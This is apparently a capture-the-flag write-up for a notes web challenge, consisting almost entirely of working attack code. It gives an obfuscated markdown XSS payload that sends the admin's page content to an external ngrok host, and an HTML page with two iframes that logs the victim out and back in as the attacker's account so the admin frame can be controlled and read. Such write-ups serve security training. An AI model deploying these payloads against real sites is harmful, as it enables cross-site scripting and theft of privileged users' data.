First - XSS on the User
<http://g<!s://q?<!-<[<script>top.admin.location='https://196cffb1.ngrok.io/?data='+JSON.stringify(top.admin.document.getElementsByClassName('is-4')[0].textContent.trim());/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(13);/*](http://g)->a>
Second - Create a page with two iframes. With one, you stay with the admin logged in and with the other one:
- Log out
- Login with your XSS user
- Control the admin iframe with XSS and exfiltrate the data
- You need to download a big image, so the bot doesn't leave when you're loading the iframes
<html>
<script type="text/javascript">
// Main page:
window.onmessage = function(event) {
console.log('receive data', event.data);
};
const TIMEOUT = 2000;
document.addEventListener('DOMContentLoaded', (event) => {
console.log('entrou aqui??');
setTimeout(() => {
user.location.href="http://notes.web.byteband.it/logout";
console.log('logged out');
setTimeout(() => {
user.location.href="http://notes.web.byteband.it/login?username=zeus&password=zeus";
console.log('logged in');
}, TIMEOUT)
}, TIMEOUT);
});
</script>
<img width="100" height="100" src="https://effigis.com/wp-content/uploads/2015/02/DigitalGlobe_WorldView2_50cm_8bit_Pansharpened_RGB_DRA_Rome_Italy_2009DEC10_8bits_sub_r_1.jpg" />
<iframe name="user" width=1000 height=200 src="http://notes.web.byteband.it/profile"></iframe>
<hr/>
<iframe name="admin" width=1000 height=200 src="http://notes.web.byteband.it/profile"></iframe>
</html>```